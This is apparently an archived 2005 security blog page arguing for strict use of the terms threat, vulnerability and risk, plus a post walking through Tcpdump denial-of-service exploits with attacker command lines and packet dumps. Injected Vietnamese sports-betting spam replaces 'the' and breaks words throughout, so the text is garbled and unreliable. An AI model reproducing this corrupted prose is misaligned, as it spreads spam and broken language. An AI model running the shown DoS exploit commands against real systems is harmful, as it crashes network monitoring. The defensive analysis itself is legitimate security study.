For those of you Microsoft-only shops, consider cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir take on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 problem in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 The Security Risk Management Guide. Chapter 1 offers cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se definitions:

  • Risk: The combination of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 probability of an event and its consequence. (ISO Guide 73)

  • Risk management: The process of determining an acceptable level of risk, assessing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 current level of risk, taking steps to reduce risk to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 acceptable level, and maintaining that level of risk.

  • Threat: A potential cause of an unwanted impact to a system or organization. (ISO 13335-1)

  • Vulnerability: Any weakness, administrative process, or act or physical exposure that makes an information asset susceptible to exploit by a threat.


Microsoft cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365n offers separate appendices with common threats and vulnerabilities. Their threats include catastrophic incidents, mechanical failures, malicious persons, and non-malicious persons, all with examples. Microsoft's vulnerabilities include physical, natural, hardware, software, media, communications, and human. Microsoft clearly delineates between threats and vulnerabilities by breaking out cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se two concepts.

I'd like to add that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 comment on my earlier posting said I should look up "threat" at dictionary.com. I'd racá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r not think that "security professionals" use a dictionary as cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 source of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir "professional" understanding of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir terms. Still, I'll debate on those grounds. The poster wrote that dictionary.com delivers "something that is a source of danger" as its definition. Here is what that site actually says:

  1. An expression of an intention to inflict pain, injury, evil, or punishment.

  2. An indication of impending danger or harm.

  3. One that is regarded as a possible danger; a menace.


Remember what we are debating here. I am concerned that so-called "security professionals" are mixing and matching cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 terms "threat" and "vulnerability" and "risk" to suit cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir fancy.

Here's vulnerability, or actually "vulnerable":

  1. Susceptible to physical or emotional injury.

  2. Susceptible to attack: “We are vulnerable both by water and land, without eicá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r fleet or army” (Alexander Hamilton).

  3. Open to censure or criticism; assailable.

  4. Liable to succumb, as to persuasion or temptation.


You'll see both words are nouns. But -- a threat is a party, an actor, and a vulnerability is a condition, a weakness. Threats exploit vulnerabilities.

Finally, risk:

  1. The possibility of suffering harm or loss; danger.


Risk is also a noun, but it is a measure of possibility. These are three distinct terms. It is not my problem that I define cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m properly, in accordance with ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs who think clearly! I am not inventing any new terms. I'm using cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m correctly.

I'd like to thank Gunnar Peterson for reminding me of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 NIST and Microsoft docs.

Wednesday, May 04, 2005

OCTAVE Properly Distinguishes Between Threats and Vulnerabilities

You may have heard of Carnegie Mellon's Software Engineering Institute. Within SEI's Networked Systems Survivability program is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Survivable Enterprise Management group. Members of this group developed cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE) method. OCTAVE is "a self-directed approach for assessing and managing information security risks. OCTAVE allows an enterprise to identify cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 information assets that are important to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 mission of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 organization, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 threats to those assets, and vulnerabilities that may expose cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 information assets to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 identified threats." Already you should notice that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 OCTAVE crew is using cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 terms risk, asset, threat, and vulnerability properly. In fact, a look at cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 OCTAVE Threat Profiles (.pdf) document reveals additional understanding of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 differences between threats and vulnerabilities:

"Below is an expanded classification of threat actors.

  • non-malicious employees: people within cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 organization who accidentally abuse or misuse computer systems and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir information

  • disgruntled employees: people within cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 organization who deliberately abuse or misuse computer systems and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir information

  • attackers: people who attack computer systems for challenge, status, or thrill

  • spies: people who attack computer systems for political gain

  • terrorists: people who attack computer systems to cause fear for political gain

  • competitors: people who attack computer systems for economic gain

  • criminals: people who attack computer systems for personal financial gain

  • vandals: people who attack computer systems to cause damage"


What, no mention of problems with Microsoft RPC services on port 135 TCP? No Cisco router denial of service condition? OCTAVE and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 SEI know cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 difference between threats and vulnerabilities and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y speak authoritatively on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 subject. Kudos to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m for being rigorous with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir terms and work.

Tuesday, May 03, 2005

There's more coming out of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Forum of Incident Response and Security Teams (FIRST) cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se days now cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y've updated cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir Web page! I just read an announcement that cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Department of Homeland Security has named FIRST cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 custodian of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Common Vulnerability Scoring System (CVSS). CVSS is a way to quantify cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 severity of a vulnerability using three groups: a base metric group, a temporal group, and an environmental group. The sample scoring shows some of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 values for recent vulnerabilities.

The definitive documents on CVSS are available on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 FIRST CVSS site. I think this system will have some legs, so keep an eye on it. My only concern is that some documents which explain CVSS confuse threats with vulnerabilities -- a common cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365me on this blog. Consider cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 following:

"Current scoring systems, in use by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Computer Emergency Response Team/Coordination Center (CERT/CC), Symantec, Internet Security Systems, Cisco Systems, and ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rs, rate vulnerabilities according to a variety of metrics and determine a single overall threat score by weighing cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se metrics."

They shouldn't say "threat score"; cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y mean "vulnerability score."

Furcá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 document we read this:

"Common causes of vulnerabilities are design flaws in software and hardware, botched administrative processes, lack of awareness and education in information security, technological advancements or improvements to current practices, any of which may result in real threats to mission-critical information systems."

Again, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365re's no threat here. A threat is a party with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 capabilities and intentions to exploit a vulnerability. Eicá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r "vulnerabilities" or "risks" is more appropriate here.

Anocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r case:

"Potential Threat: These are vulnerabilities that are dependent on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exploitation of ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r vulnerabilities before cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y become a risk."

Argh, this is even worse, as it defines a threat as a vulnerability. Wrong again.

"Real-time Attack Scoring: CVSS does not have any capacity for tracking cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 threats posed by cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 ongoing exploitation of vulnerabilities."

They probably mean "risks" here.

"A vulnerability that is remotely exploitable is considered to be a higher risk threat than one that is only locally exploitable, since cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 pool of potential attackers is greater."

Great, all three terms are mixed up here. Delete "threat" from cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 sentence and it makes more sense.

So what is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 document I've been citing? It's cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 National Infrastructure Advisory Council, in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir final recommendations and report on CVSS available in .pdf form here. At cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 time cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 report was written, John Chambers (CEO of Cisco) and John Thompson (CEO of Symantec) were in charge. I would expect cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365m to exercise a little more intellectual rigor on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 documents cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365ir group produces. I have no expectations at all that a report headed by someone like my favorite graduate professor Phil Zelikow would make cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se sorts of amateur mistakes!

While on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 subject of vulnerabilities, it's worth noting cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 release of cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 latest SANS Most Critical New Vulnerabilities Discovered or Patched During cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 First Quarter of 2005. Let's see if cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y can keep threats and vulnerabilities as distinct ideas:

"However, since new Internet threats are discovered daily, user organizations that rely on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Top20 as a list of high priority threats have been asking for more frequent updates."

I guess not. In both cases cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y mean vulnerabilities here. Nothing has changed since I last reported on this semantic muddle. Oh well.

Thursday, April 28, 2005

Tcpdump Vulnerabilities

I learned of four vulnerabilities in Tcpdump found by Vade79 by checking cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 latest exploits at Packet Storm. Linking to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 exploits cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365mselves, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365y are:

xtcpdump-ldp-dos.c: Tcpdump 3.8.3 and below mishandles Multi-Protocol Label Switching (MPLS) Label Distribution Protocol (LDP) packets. The effect is a local denial of service to Tcpdump. No system needs to be listening to port 646 TCP for Tcpdump to be affected.

If you run xtcpdump-ldp-dos, it looks like this to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attacker:

./xtcpdump-ldp-dos 192.168.1.1 nospoof
[*] tcpdump[3.8.x]: (LDP) ldp_print() infinite loop DOS.
[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)

[*] destination : 192.168.1.1
[*] amount : 5

[+] sending(packet = .): .....

[*] done.

Here is how Tcpdump handles it, if you're running Tcpdump "live" on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 CLI without cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 -v switch:

Unknown Message (0x7fff), length: 0, Message ID:
0xffffffff, Flags: [continue processing if unknown]
Unknown Message (0x7fff), length: 0, Message ID:
0xffffffff, Flags: [continue processing if unknown]
...continues...

If you add cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 -v switch, you see this:

09:09:02.092665 IP (tos 0x0, ttl 64, id 41668, offset 0,
flags [none], length: 46) 192.168.1.5.52016 > 192.168.1.1.646:
[udp sum ok]
LDP, Label-Space-ID: 255.255.255.255:65535, length: 18
Unknown Message (0x7fff), length: 0, Message ID:
0xffffffff, Flags: [continue processing if unknown]
0x0000: 0402 6ee0 7042 0e6a 0100 4600 0000 4600
0x0010: 0000 1200 0030 4841 f956 00c0 9f3f 4fc5
0x0020: 0800 4500 0038 917f 0000 4001 65ef c0a8
0x0030: 0101 c0a8 0105 0303 2f2c 0000 0000 4500
0x0040: 002e a2c4 0000 4011 54a4 c0a8 0105 c0a8
0x0050: 0101 cb30 0286 001a 0000 6ee0 7042 3b53
0x0060: 0200 3c00 0000 3c00 0000 1200 00c0 9f3f
0x0070: 4fc5 0030 4841 f956 0800 4500 002e a2c5
0x0080: 0000 4011 54a3 c0a8 0105 c0a8 0101 cb31
0x0090: 0286 001a aeaa 0001 ffff ffff ffff ffff
0x00a0: ffff 0000 ffff ffff 1e38 6ee0 7042 4953
0x00b0: 0200 4600 0000 4600 0000 1200 0030 4841
0x00c0: f956 00c0 9f3f 4fc5 0800 4500 0038 9180
0x00d0: 0000 4001 65ee c0a8 0101 c0a8 0105 0303
0x00e0: 2f2b 0000 0000 4500 002e a2c5 0000 4011
0x00f0: 54a3 c0a8 0105 c0a8 0101 cb31 0286 001a
0x0100: 0000 6ee0 7042 783d 0300 3c00 0000 3c00
0x0110: 0000 1200 00c0 9f3f 4fc5 0030 4841 f956
...continues...

Here is how Snort sees cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 traffic. Only one packet is shown.

04/28-09:07:30.928973 192.168.1.5:52016 -> 192.168.1.1:646
UDP TTL:64 TOS:0x0 ID:41668 IpLen:20 DgmLen:46
Len: 18
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 2E A2 C4 00 00 40 11 54 A4 C0 A8 01 05 C0 A8 ......@.T.......
0x0020: 01 01 CB 30 02 86 00 1A AE AB 00 01 FF FF FF FF ...0............
0x0030: FF FF FF FF FF FF 00 00 FF FF FF FF ............

Here is sample traffic for you to try: ldp-dos.taosecurity.lpc. You should be able to run this through Tcpdump using cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 -r option without killing Tcpdump.

xtcpdump-bgp-dos.c: Tcpdump 3.8.3 and below mishandles Border Gateway Protocol (BGP) packets. The effect is a local denial of service to Tcpdump. A system watched by Tcpdump needs to be listening on port 179 TCP for Tcpdump to be affected. I simulated this by having Netcat listen on port 179 TCP.

If you run xtcpdump-bgp-dos.c, it looks like this to cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 attacker:

./xtcpdump-bgp-dos.c 192.168.1.1 nospoof
[*] tcpdump[3.8.x]: (BGP) RT_ROUTING_INFO infinite loop DOS.
[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)

[*] target: 192.168.1.1
[*] attempting to connect...
[*] successfully connected.
[*] sending malformed BGP data. (34 bytes)
[*] closing connection.

[*] done.

Here is how Tcpdump handles it, if you're running Tcpdump "live" on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 CLI:

tcpdump -n -i em1 -s 1515 -v

tcpdump: listening on em1, link-type EN10MB (Ecá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365rnet), capture size 1515 bytes
09:04:48.530004 IP (tos 0x0, ttl 64, id 37797, offset 0,
flags [DF], length: 60) 192.168.1.5.57471 > 192.168.1.1.179:
S [tcp sum ok] 2061108147:2061108147(0) win 65535


09:04:48.530039 IP (tos 0x0, ttl 64, id 30686, offset 0,
flags [DF], length: 60) 192.168.1.1.179 > 192.168.1.5.57471:
S [bad tcp cksum 8385 (->b9d4)!] 2753925437:2753925437(0)
ack 2061108148 win 65535
timestamp 207951117 145837700>

09:04:48.530250 IP (tos 0x0, ttl 64, id 37798, offset 0,
flags [DF], length: 52) 192.168.1.5.57471 > 192.168.1.1.179:
. [tcp sum ok] ack 1 win 33304 <>
145837700 207951117>

09:04:49.031589 IP (tos 0x0, ttl 64, id 37800, offset 0,
flags [DF], length: 87) 192.168.1.5.57471 > 192.168.1.1.179:
P [tcp sum ok] 1:36(35) ack 1 win 33304 <>
145837751 207951117>: BGP, length: 35
Update Message (2), length: 19
Withdrawn routes: 1 bytes
Multi-Protocol Reach NLRI (14), length: 255,
Flags [OTPE+f]:
AFI: IPv4 (1), vendor specific SAFI: Route Target
Routing Information (132), no SNPA
(illegal prefix length)
(illegal prefix length)
...continues...

Here is how Snort sees cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 traffic. Although cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 entire session is shown, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 fourth packet is cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 killer.

04/28-09:03:17.383320 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37797 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7ADA03B3 Ack: 0x0 Win: 0xFFFF TcpLen: 40
TCP Options (6) => MSS: 1460 NOP WS: 1 NOP NOP TS: 145837700 0
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 3C 93 A5 40 00 40 06 23 C0 C0 A8 01 05 C0 A8 .<..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B3 00 00 00 00 A0 02 ......z.........
0x0030: FF FF 10 BB 00 00 02 04 05 B4 01 03 03 01 01 01 ................
0x0040: 08 0A 08 B1 4E 84 00 00 00 00 ....N.....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.383581 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:30686 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0xA425913D Ack: 0x7ADA03B4 Win: 0xFFFF TcpLen: 40
TCP Options (6) => MSS: 1460 NOP WS: 1 NOP NOP TS: 207951117 145837700
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 3C 77 DE 40 00 40 06 3F 87 C0 A8 01 01 C0 A8 .<>
0x0020: 01 05 00 B3 E0 7F A4 25 91 3D 7A DA 03 B4 A0 12 .......%.=z.....
0x0030: FF FF B9 D4 00 00 02 04 05 B4 01 03 03 01 01 01 ................
0x0040: 08 0A 0C 65 15 0D 08 B1 4E 84 ...e....N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.383646 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37798 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x7ADA03B4 Ack: 0xA425913E Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837700 207951117
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 34 93 A6 40 00 40 06 23 C7 C0 A8 01 05 C0 A8 .4..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B4 A4 25 91 3E 80 10 ......z....%.>..
0x0030: 82 18 63 81 00 00 01 01 08 0A 08 B1 4E 84 0C 65 ..c.........N..e
0x0040: 15 0D ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.884950 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37800 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x7ADA03B4 Ack: 0xA425913E Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837751 207951117
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 57 93 A8 40 00 40 06 23 A2 C0 A8 01 05 C0 A8 .W..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B4 A4 25 91 3E 80 18 ......z....%.>..
0x0030: 82 18 DC FF 00 00 01 01 08 0A 08 B1 4E B7 0C 65 ............N..e
0x0040: 15 0D FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
0x0050: FF FF 00 13 02 00 01 00 FF 00 FF 0E 00 FF 00 01 ................
0x0060: 84 00 00 00 00 .....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.984345 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:30793 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xA425913E Ack: 0x7ADA03D7 Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951178 145837751
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 34 78 49 40 00 40 06 3F 24 C0 A8 01 01 C0 A8 .4xI@.@.?$......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D7 80 10 .......%.>z.....
0x0030: 82 18 62 EE 00 00 01 01 08 0A 0C 65 15 4A 08 B1 ..b........e.J..
0x0040: 4E B7 N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396501 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:38045 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x7ADA03D7 Ack: 0xA425913E Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837802 207951178
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 34 94 9D 40 00 40 06 22 D0 C0 A8 01 05 C0 A8 .4..@.@.".......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 D7 A4 25 91 3E 80 11 ......z....%.>..
0x0030: 82 18 62 BA 00 00 01 01 08 0A 08 B1 4E EA 0C 65 ..b.........N..e
0x0040: 15 4A .J

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396841 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:31075 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xA425913E Ack: 0x7ADA03D8 Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951219 145837802
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 34 79 63 40 00 40 06 3E 0A C0 A8 01 01 C0 A8 .4yc@.@.>.......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D8 80 10 .......%.>z.....
0x0030: 82 18 62 91 00 00 01 01 08 0A 0C 65 15 73 08 B1 ..b........e.s..
0x0040: 4E EA N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396856 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:31076 IpLen:20 DgmLen:52 DF
***A***F Seq: 0xA425913E Ack: 0x7ADA03D8 Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951219 145837802
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 34 79 64 40 00 40 06 3E 09 C0 A8 01 01 C0 A8 .4yd@.@.>.......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D8 80 11 .......%.>z.....
0x0030: 82 18 62 90 00 00 01 01 08 0A 0C 65 15 73 08 B1 ..b........e.s..
0x0040: 4E EA N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396922 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:38046 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x7ADA03D8 Ack: 0xA425913F Win: 0x8217 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837802 207951219
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 34 94 9E 40 00 40 06 22 CF C0 A8 01 05 C0 A8 .4..@.@.".......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 D8 A4 25 91 3F 80 10 ......z....%.?..
0x0030: 82 17 62 91 00 00 01 01 08 0A 08 B1 4E EA 0C 65 ..b.........N..e
0x0040: 15 73 .s

Here is sample traffic for you to try: bgp-dos.taosecurity.lpc. You should be able to run this through Tcpdump using cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 -r option without killing Tcpdump.

Vade79 also released exploits titled xtcpdump-isis-dos.c and xtcpdump+ethr-rsvp-dos.c, for Intermediate System to Intermediate System (IS-IS) and Resource ReSerVation setup Protocol (RSVP), respectively.

While I could get all four exploits to compile on FreeBSD, I could not get cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se last two to generate traffic. I believe cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 problem lies with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 spoofing mechanism in each exploit. I was only able to get cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 first two exploits to work when I enabled cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "nospoof" options.

Keep an eye on Tcpdump.org and cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 tcpdump-workers mailing list for developments. The latest tcpdump-current.tar.gz or CVS check-outs should be patched. I also expect to see a Tcpdump 3.9.0 official release patched against cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se problems next week.

Wednesday, January 26, 2005

SANS Confuses Threats with Vulnerabilities

In late 2003 I published Dynamic Duo Discuss Digital Risk. This was my light-hearted attempt to reinforce cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 distinction between a threat and a vulnerability. Specifically, a threat is a party with cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 capabilities and intentions to exploit a vulnerability in an asset. A vulnerability is a weakness in an asset that could lead to exploitation. An intruder (cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 threat) exploits a hole (cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 vulnerability) in Microsoft IIS to gain remote control of a Web server. In ocá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365r words, threats exploit vulnerabilities.

This is a simple concept, yet it is frequently confused by security prophets like Bruce Schneier in Beyond Fear. Now SANS is making cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 same mistake in cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 latest Incident Handler's Diary. In a posting to announce work on cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 upcoming SANS Top 20 List, cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 Diary calls cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 new report cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 "SANS CRITICAL INTERNET THREATS 2005" and says:

"SANS Critical Internet Threats research is undertaken annually and provides cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 basis for cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 SANS 'Top 20' report. The 'Top 20' report describes cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 most serious internet security threats in detail, and provides cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365 steps to identify and mitigate cá cược thể thao bet365_cách nạp tiền vào bet365_ đăng ký bet365se threats."

